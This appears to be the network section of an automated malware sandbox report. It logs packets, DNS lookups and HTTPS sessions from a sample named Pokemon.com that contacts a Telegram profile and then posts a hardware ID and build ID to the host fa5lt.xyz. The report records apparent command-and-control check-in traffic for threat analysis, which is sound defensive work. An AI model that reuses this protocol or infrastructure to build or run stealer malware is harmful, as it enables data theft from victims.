                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.811296940 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.818670988 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.152729034 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.158432961 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.158588886 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.158683062 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.158745050 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.180511951 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.521847010 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.527386904 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.527724028 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.527941942 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.527951002 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.537645102 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.871239901 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.876209974 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.876270056 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.876394987 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.876573086 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.885824919 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.222268105 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.236387014 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.236521959 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.236562967 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.236917973 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.245621920 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.579063892 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.586131096 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.586174011 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.586282015 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.586484909 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.594106913 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.928411007 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.933743000 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.933820009 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.933885098 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.933979988 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.942452908 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.276793003 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.293152094 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.293164015 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.293174028 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.293560028 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.301696062 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.635562897 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.640773058 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.640785933 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.640871048 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.641134024 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.648334026 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.982228041 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.987775087 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.987814903 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.987911940 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.988183975 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:02.994807005 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.328353882 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.335967064 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.335980892 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.335998058 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.336292982 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.343035936 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.676665068 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.682303905 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.682317019 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.682399035 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.682409048 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.682699919 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.711299896 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:03.714045048 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.040452957 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.048188925 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.053802967 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.053814888 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.053823948 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.054255009 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.061300993 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.395062923 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.402405977 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.402448893 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.402576923 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.402707100 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.408916950 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.747739077 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.754045963 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.754086971 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.754164934 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.754404068 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:04.759778023 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:05.093241930 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:05.101417065 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:05.101514101 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:05.101528883 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:05.611541033 CET4436396823.200.88.9192.168.2.5

                                                                                                                                                                                                                                                                                    ICMP Packets

                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.960179090 CET192.168.2.51.1.1.1c1fe(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.965182066 CET192.168.2.51.1.1.1c299(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.385757923 CET192.168.2.51.1.1.1c294(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:02.716891050 CET192.168.2.51.1.1.10x3f5eStandard query (0)BjQpTJiVkzRqS.BjQpTJiVkzRqSA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.552586079 CET192.168.2.51.1.1.10x788eStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.740348101 CET192.168.2.51.1.1.10x657eStandard query (0)fa5lt.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.730393887 CET192.168.2.51.1.1.10x39c7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.730580091 CET192.168.2.51.1.1.10xdee9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:13.948277950 CET192.168.2.51.1.1.10x6d1eStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:13.948580980 CET192.168.2.51.1.1.10x8196Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:16.828819036 CET192.168.2.51.1.1.10xa23bStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:16.829001904 CET192.168.2.51.1.1.10x4144Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.576400995 CET192.168.2.51.1.1.10xe420Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.576569080 CET192.168.2.51.1.1.10x3a2Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.785406113 CET192.168.2.51.1.1.10x9d5eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.785676003 CET192.168.2.51.1.1.10xea21Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.786103964 CET192.168.2.51.1.1.10xf6d5Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.786315918 CET192.168.2.51.1.1.10x9beeStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.792994022 CET192.168.2.51.1.1.10x7fecStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.793138981 CET192.168.2.51.1.1.10x18e5Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.958013058 CET192.168.2.51.1.1.10xa978Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.958115101 CET192.168.2.51.1.1.10x4a2fStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.960062981 CET192.168.2.51.1.1.10x13d1Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.960278988 CET192.168.2.51.1.1.10x57c1Standard query (0)assets.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:02.949616909 CET1.1.1.1192.168.2.50x3f5eName error (3)BjQpTJiVkzRqS.BjQpTJiVkzRqSnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:17.027544975 CET1.1.1.1192.168.2.50x9c4bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:17.027544975 CET1.1.1.1192.168.2.50x9c4bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.690644026 CET1.1.1.1192.168.2.50x788eNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.046957970 CET1.1.1.1192.168.2.50x657eNo error (0)fa5lt.xyz116.203.8.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.867925882 CET1.1.1.1192.168.2.50x39c7No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.960066080 CET1.1.1.1192.168.2.50xdee9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:14.086261034 CET1.1.1.1192.168.2.50x8196No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:14.087500095 CET1.1.1.1192.168.2.50x6d1eNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:15.107899904 CET1.1.1.1192.168.2.50x8e4No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:15.107899904 CET1.1.1.1192.168.2.50x8e4No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:15.276489973 CET1.1.1.1192.168.2.50x6eaNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:16.967116117 CET1.1.1.1192.168.2.50x4144No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.058937073 CET1.1.1.1192.168.2.50xa23bNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.713632107 CET1.1.1.1192.168.2.50xe420No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.713632107 CET1.1.1.1192.168.2.50xe420No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.714078903 CET1.1.1.1192.168.2.50x3a2No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.922343016 CET1.1.1.1192.168.2.50xea21No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.922729015 CET1.1.1.1192.168.2.50x9d5eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.922729015 CET1.1.1.1192.168.2.50x9d5eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.922841072 CET1.1.1.1192.168.2.50xf6d5No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.922841072 CET1.1.1.1192.168.2.50xf6d5No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.923219919 CET1.1.1.1192.168.2.50x9beeNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.929986954 CET1.1.1.1192.168.2.50x7fecNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.929986954 CET1.1.1.1192.168.2.50x7fecNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.930006981 CET1.1.1.1192.168.2.50x18e5No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.020245075 CET1.1.1.1192.168.2.50x85ffNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.020245075 CET1.1.1.1192.168.2.50x85ffNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.097486973 CET1.1.1.1192.168.2.50x57c1No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.097734928 CET1.1.1.1192.168.2.50xa978No error (0)sb.scorecardresearch.com18.161.69.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.097734928 CET1.1.1.1192.168.2.50xa978No error (0)sb.scorecardresearch.com18.161.69.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.097734928 CET1.1.1.1192.168.2.50xa978No error (0)sb.scorecardresearch.com18.161.69.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.097734928 CET1.1.1.1192.168.2.50xa978No error (0)sb.scorecardresearch.com18.161.69.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.098839045 CET1.1.1.1192.168.2.50x13d1No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                    • t.me
                                                                                                                                                                                                                                                                                    • fa5lt.xyz
                                                                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                                                                    • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                    • https:
                                                                                                                                                                                                                                                                                      • assets.msn.com
                                                                                                                                                                                                                                                                                      • c.msn.com
                                                                                                                                                                                                                                                                                      • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                      • browser.events.data.msn.com

                                                                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.549760149.154.167.994436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:41 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:41 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                    Content-Length: 12293
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: stel_ssid=967fa648526f6bbfda_16712613975395752538; expires=Sat, 28 Dec 2024 13:46:41 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:41 UTC12293INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    1192.168.2.549766116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:43 UTC229OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    2192.168.2.549772116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:46 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ZCTRQ9R1VKF3EU3OZCT0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 255
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:46:46 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 54 52 51 39 52 31 56 4b 46 33 45 55 33 4f 5a 43 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 39 32 43 31 34 35 43 37 41 36 38 39 34 36 31 37 39 39 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 52 51 39 52 31 56 4b 46 33 45 55 33 4f 5a 43 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 52 51 39 52 31 56 4b 46 33 45 55 33 4f 5a 43 54 30 2d 2d 0d 0a
